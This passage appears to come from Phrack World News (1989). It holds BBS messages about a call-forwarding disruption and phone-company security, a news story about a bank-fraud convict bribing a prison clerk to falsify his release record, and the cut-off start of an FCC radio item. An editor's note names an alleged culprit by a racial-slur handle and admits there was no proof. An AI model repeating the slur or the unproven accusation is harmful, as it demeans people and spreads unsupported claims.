  3616. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3617.  
  3618. Numb: 90 of 98                7/3/89 at 5:03 pm
  3619. Subj: I find this interesting...
  3620. Sect: General Messages
  3621. From: The Mechanic
  3622.  
  3623. I have seen Major Havoc post several messages recently (both here [The Free
  3624. World bulletin board] and elsewhere) on the topic of telephone security.  While
  3625. it was not explicitly mentioned, it was implied that some activities discussed
  3626. might not be entirely legal.  In fact, there is a logon message encouraging
  3627. users to post as much as possible, as well as upload and download software,
  3628. including software that may be copyrighted.  Now we see a message from MHavoc
  3629. that some of us may be looking forward to "BIG Surprises."  I do not know about
  3630. you, but I'm going to think twice before I post *anything* to this system, at
  3631. least until I am assured that material on this board is not being monitored by
  3632. C&P personnel.
  3633.  
  3634. I think that if MHavoc wants this system to go anywhere, he is going to have to
  3635. *prove* to us that he is not going to be narcing on people as a result of what
  3636. they post.
  3637.  
  3638. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3639.  
  3640. Numb: 91 of 98                7/3/89 at 5:23 pm
  3641. Subj: ...
  3642. Sect: General Messages
  3643. From: Major Havoc
  3644.  
  3645. The information was not supplied by myself.  It was information that was read
  3646. to me by C&P security people.  I stood there plainly denying that I even knew
  3647. what a modem was.
  3648.  
  3649. The bottom line is that you do not have to worry about me.  You need to worry
  3650. about the information that they already have.  They merely asked me if I knew
  3651. anything about it.  Of course I did not...seriously, I don't even know.
  3652.  
  3653.                                                               -Major Havoc
  3654.  
  3655. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3656.  
  3657. Numb: 93 of 98                7/3/89 at 8:29 pm
  3658. Subj: ...
  3659. Sect: General Messages
  3660. From: Juan Valdez
  3661.  
  3662. I am sure Major Havoc cannot reveal the name of the person who did it, since he
  3663. is under investigation, it would make matters more difficult to make his name
  3664. public.  I am sure we'd all like to know maybe after everything is all done
  3665. with.  This thing about C&P cracking down scares me.  I know that I have not
  3666. done anything like what you mentioned and I am not connected to anything
  3667. directly as far as I know.  Now you are getting me paranoid.
  3668.  
  3669.                                 Mike
  3670.  
  3671. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3672.  
  3673.  
  3674. Numb: 94 of 98                7/3/89 at 9:31 pm
  3675. Subj: Hmm...
  3676. Sect: General Messages
  3677. From: Mr. Mystery
  3678.  
  3679. When it becomes possible, please post his name, and, more
  3680. importantly, the date of his court appearance.  Might be worth
  3681. watching.
  3682.  
  3683.                                                            - MR. MYSTERY
  3684.  
  3685. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3686.  
  3687. Numb: 95 of 98                7/3/89 at 11:10 pm
  3688. Subj: That
  3689. Sect: General Messages
  3690. From: The Killer
  3691.  
  3692. Is he a local or just an upset user.  What sort of stuff was the
  3693. phone company upset about?  Phreakers or people tampering with
  3694. their equipment?  That is pretty messed up.
  3695.  
  3696. So long as my ass is clean, I really hope you get the idiot.  I
  3697. am curious --Is he a phone company employee?  How did he get into
  3698. the system?
  3699.  
  3700. [Killer/USAlliance] - FW:301/486-4515
  3701.  
  3702. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3703.  
  3704. Numb: 96 of 98                7/4/89 at 2:26 am
  3705. Subj: Things.........
  3706. Sect: General Messages
  3707. From: Hellraiser
  3708.  
  3709. Would I be correct to assume that this board is completely
  3710. "private."  At any rate, I would be interested in knowing who
  3711. this person causing the disturbance is/was (drop a hint).
  3712.  
  3713.  
  3714. Numb: 97 of 98                7/4/89 at 6:33 pm
  3715. Subj: Jesus...
  3716. Sect: General Messages
  3717. From: The Disk Jockey
  3718.  
  3719. Geez... Someone learns a few LMOS commands and they seem obsessed
  3720. with doing stupid things.
  3721.  
  3722. I have absolutely no idea why people would act wary towards
  3723. Havoc, I am sure that I and anyone else who ran a board would,
  3724. given the chance, burn the person disrupting the system.  What
  3725. the hell did you think?  Havoc should just let it slide?  I think
  3726. not.  People like that (doers of such cute call forwarding
  3727. things) should be screwed.  They are the people that give you a
  3728. bad reputation.
  3729.  
  3730.                                                        -The Disk Jockey
  3731.  
  3732. I hope he gets nailed, I just find it hard to believe that he
  3733. left any information that could lead back to him, as someone who
  3734. was at least smart enough to get into an LMOS or equivalent could
  3735. have at least some common sense, but I suppose his acts dictate
  3736. otherwise.
  3737.  
  3738. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3739.  
  3740. Numb: 98 of 98                7/4/89 at 7:21 pm
  3741. Subj: Well...
  3742. Sect: General Messages
  3743. From: Microchip
  3744.  
  3745. When it was on interchat, it said Major Havoc was fed up and it
  3746. was going to do this until we all calmed down
  3747.  
  3748. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3749. For those who never found out, the perpetrator of the call
  3750. forwarding was none other than SuperNigger (who is also
  3751. responsible for crashing Black Ice).  There never was any solid
  3752. proof that could be used and any comments about him leaving a
  3753. trail to follow back to him were bluffs. -KL
  3754. _______________________________________________________________________________
  3755.  
  3756. Conman Loses Prison Phone Privileges                         September 23, 1989
  3757. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3758. About a year ago there was a plot to steal $69 million from the
  3759. First National Bank of Chicago through a fraudulent wire-transfer
  3760. scheme masterminded by a man named Armand Moore.  Using the
  3761. telephone and a computer -- the tools of his trade, Mr. Moore
  3762. planned to transfer money from the accounts of corporate
  3763. customers at First National to his account in Switzerland.
  3764.  
  3765. He needed some inside help to bring it off, and he found two
  3766. young guys in the wire transfer room at the bank who were willing
  3767. to help.  Both of the clerks were fellows in their early
  3768. twenties, who had worked for the bank a couple years each.  Both
  3769. had come from families living in a ghetto neighborhood on the
  3770. south side of Chicago; but their families had raised them to be
  3771. honest.  Both had been average high school students; neither had
  3772. any previous criminal record of any sort; both had been given a
  3773. break by an employer who treated them fairly and allowed them to
  3774. rise to positions of trust:  handling huge sums of money --about
  3775. a hundred million dollars a day -- in the wire-transfer unit at
  3776. the bank.  Both showed great promise; then Armand Moore came
  3777. along.
  3778.  
  3779. Moore wined and dined these two kids; showed them the best of
  3780. times and what it was like to have a fancy apartment in a wealthy
  3781. neighborhood instead of living with your parents in an inner-city
  3782. ghetto.  Its not that they weren't guilty --after all, they did
  3783. provide the secret passwords and phrases which bank employees say
  3784. to one another on the telephone, and they did press the buttons
  3785. which sent $69 million dollars on its way to Europe -- but they
  3786. would not have done it if Armand Moore had not been there.
  3787.  
  3788. So instead of a career at the bank, the guys exchanged it for an
  3789. indictment for bank fraud; loss of their jobs; humiliation for
  3790. themselves and their families; and the right to say "convicted of
  3791. bank fraud" on future job applications.  Naturally, they are
  3792. blacklisted in the banking and computer industries for the rest
  3793. of their lives.  One of the guys said Armand had promised to give
  3794. him money to buy his mother a new coat.
  3795.  
  3796. The job at First National was bungled as we all know, two young
  3797. guys had their lives ruined, and the court took all this into
  3798. consideration when Armand Moore was sentenced to ten years in
  3799. prison last June.  But as Paul Harvey would say, "...then there
  3800. is the rest of the story...."
  3801.  
  3802. It seems Armand Moore was no stranger to bank fraud.  He had
  3803. previously pulled a couple of smaller jobs, using a telephone and
  3804. a computer to net about a million dollars from two banks in the
  3805. Detroit area.  The FBI had not previously connected him with
  3806. those jobs.  He had this money stashed away, waiting for him when
  3807. he got released from prison, which in this latest scheme, would
  3808. be a lot sooner than the government expected.
  3809.  
  3810. Mr. Moore is the sort of fellow who could sell the proverbial
  3811. ice-box to an Eskimo... or a newspaper subscription to a blind
  3812. man... he can get anybody to do anything it seems... by flirting
  3813. with them, showering them with attention, and if necessary, just
  3814. bribing them.  Now two more lives have been ruined by Armand
  3815. Moore, and his only regret is he got caught.
  3816.  
  3817. Since his trial in June, Armand Moore has been a guest of the
  3818. government at the federal penitentiary in downtown Chicago.  As a
  3819. long term resident, he's gotten to know a lot of the folks,
  3820. including the employees of the prison.  In particular, he got to
  3821. be very good friends with Randy W. Glass, age 28, an employee of
  3822. the prison in the computer facility there.  Glass' duties include
  3823. entering data into the prison computer about the inmates, their
  3824. sentences and other data.  Oh... is the story becoming clearer
  3825. now?
  3826.  
  3827. Glass and his wife live in Harvey, IL, a middle class suburb on
  3828. the south side of Chicago.  It seems like so many other people
  3829. who meet Armand Moore, Glass enjoyed the company of this older,
  3830. very sophisticated and friendly chap.  After several meetings in
  3831. the past three months, Glass was finally seduced by Moore's
  3832. money, like everyone else who meets him.  That, plus his pleasant
  3833. manners, his smooth conversation and his assurance that nothing
  3834. could go wrong led to Glass finally agreeing to accept a $70,000
  3835. bribe in exchange for punching a few buttons on the computer to
  3836. show Armand Moore's sentence was complete; him and a couple other
  3837. inmates who were sharing the same room at the prison.  Just
  3838. change a few details, punch a few buttons -- and to be on the
  3839. safe side, do it from home with your modem and terminal, using
  3840. the Warden's password which I just happen to have and will give
  3841. to you in exchange for your cooperation.
  3842.  
  3843. $70,000 was hard to resist.  But Glass was a prudent man, and he
  3844. asked what guarantee would he have of payment once Armand Moore
  3845. was released.  After all, hadn't he promised those fellows at the
  3846. bank all sorts of things and then tried to skip town immediately
  3847. when he thought the transfer had gone through?  He would even
  3848. cheat his fellow crooks, wouldn't he?
  3849.  
  3850. Moore offered a $20,000 "down payment" to show his intentions.  A
  3851. confederate outside the prison would meet Glass' wife and give
  3852. her the money.  Then the job would be done, and following Moore's
  3853. untimely release from the joint, the rest would be paid.  The
  3854. deal was made, alleges the government, and Armand Moore used a
  3855. pay phone at the prison that day to call his stepsister and have
  3856. her arrange to meet Mrs. Glass.  The money would be exchanged;
  3857. Glass was off two days later and would make the necessary
  3858. "adjustments" from his home computer; the prison roll would
  3859. reflect this on the next morning's roster of prisoners with the
  3860. notation "Time Served/Release Today."  They would meet that
  3861. evening and exchange the rest of the money.
  3862.  
  3863. All telephones at the prison, including the public pay phones,
  3864. are subject to monitoring.  A sign on each pay phone advises that
  3865. "your call may be monitored by an employee authorized to do so."
  3866. The FBI alleges that recordings were made of Moore on the phone
  3867. telling his stepsister that she should "...work with Randy, a
  3868. person affiliated with the law..." and that she would meet Mrs.
  3869. Glass the next day.  With a court ordered tap obtained a few
  3870. minutes later, the FBI heard Stephanie Glass agree to meet
  3871. Moore's stepsister at 5:45 AM the next morning in a parking lot
  3872. in Richton Park, IL.
  3873.  
  3874. At the appointed time the next morning, the two cars met in the
  3875. parking lot, and the FBI alleges the one woman handed the other a
  3876. package containing $20,000 in cash.  The FBI videotaped the
  3877. meeting and waited until Mrs. Glass had driven away.  They
  3878. followed her home, and arrested her at that time.  Randy Glass
  3879. was arrested at the prison when he arrived for work about an hour
  3880. later.  Armand Moore was arrested in his cell at the prison once
  3881. Glass had been taken into custody.  To do it the other way around
  3882. might have caused Glass to get tipped off and run away.
  3883.  
  3884. On Thursday, September 21, 1989 Mr. & Mrs. Glass and Armand Moore
  3885. appeared before United States Magistrate Joan Lefkow for
  3886. arraignment and finding of probable cause.  Finding probable
  3887. cause, she ordered all three held without bail at the prison
  3888. until their trial.  Randy Glass is now, so to speak, on the wrong
  3889. side of the bars at the place where he used to work.  He was
  3890. suspended without pay at the time of his arrest.
  3891.  
  3892. At the hearing, Magistrate Lefkow directed some particularly acid
  3893. comments to Mr. Moore, noting that he was forbidden to ever use
  3894. the telephone again for any reason for the duration of his
  3895. confinement, and was forbidden to ever be in the vicinity of the
  3896. computer room for any reason, also for the duration.
  3897.  
  3898. She noted, "...it seems to me you continue to seek the
  3899. conspiracy's objectives by using the telephone, and convincing
  3900. others to manipulate the computer..." you stand here today and
  3901. show no remorse whatsoever except that you were caught once
  3902. again.  Your prison record notes that on two occasions, prison
  3903. staff have observed you using the telephone and "...pressing the
  3904. touchtone buttons in a peculiar way during the call..." and that
  3905. you were counseled to stop doing it.  I will tell you now sir
  3906. that you are not to use the telephone for any reason for the
  3907. remainder of your current sentence.  I find probable cause to
  3908. hold you over for trial on the charge of bribery of a government
  3909. employee.  Stay away from the phones and computers at the prison
  3910. Mr. Moore!"
  3911.  
  3912. Like Gabriel Taylor at the First National Bank, neither Randy
  3913. Glass or his wife had any prior arrest record or conviction.  In
  3914. a foolish moment of greed, spurred on by a friendly fellow who
  3915. Randy really enjoyed talking to "...because he was so smart and
  3916. well-educated..." they now get to face prison and the loss of
  3917. everything in their lives.  When all three were leaving the
  3918. courtroom Thursday, Armand Moore snickered and smiled at the
  3919. audience.  He'll find other suckers soon enough.
  3920. ______________________________________________________________________
  3921.  
  3922.                                 ==Phrack Inc.==
  3923.  
  3924.                     Volume Three, Issue 28, File #11 of 12
  3925.  
  3926.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3927.             PWN                                                 PWN
  3928.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3929.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3930.             PWN               Issue XXVIII/Part 3               PWN
  3931.             PWN                                                 PWN
  3932.             PWN                 October 7, 1989                 PWN
  3933.             PWN                                                 PWN
  3934.             PWN          Created, Written, and Edited           PWN
  3935.             PWN               by Knight Lightning               PWN
  3936.             PWN                                                 PWN
  3937.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3938.  
  3939.  
  3940. FCC Orders Radio Station To Stop Phone Pranks                   August 30, 1989
  3941. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3942. The Federal Communications Commission has slapped Chicago radio
  3943. station WLUP-AM (1000) and WLUP-FM (97.9) with a $5000 fine and
  3944. threatened to pull their license for illegally broadcasting phone
  3945. calls to "unsuspecting individuals."
  3946.  
  3947. The FCC specifically cited "willful behavior and repeated
  3948. violations of its policy that recipients of phone calls from
  3949. radio stations must be informed in advance -- and on the air at
  3950. the start of the call -- that they are being broadcast."
  3951.  
  3952. In particular, the FCC noted that morning host Jonathon
  3953. Brandmeier and mid-day host Kevin Matthews were in frequent
  3954. violation of this rule.
  3955.  
  3956. Scott G. Ginsberg, president and chief executive officer of
  3957. Evergreen Media Corporation, parent company and license holder
  3958. for WLUP confirmed tha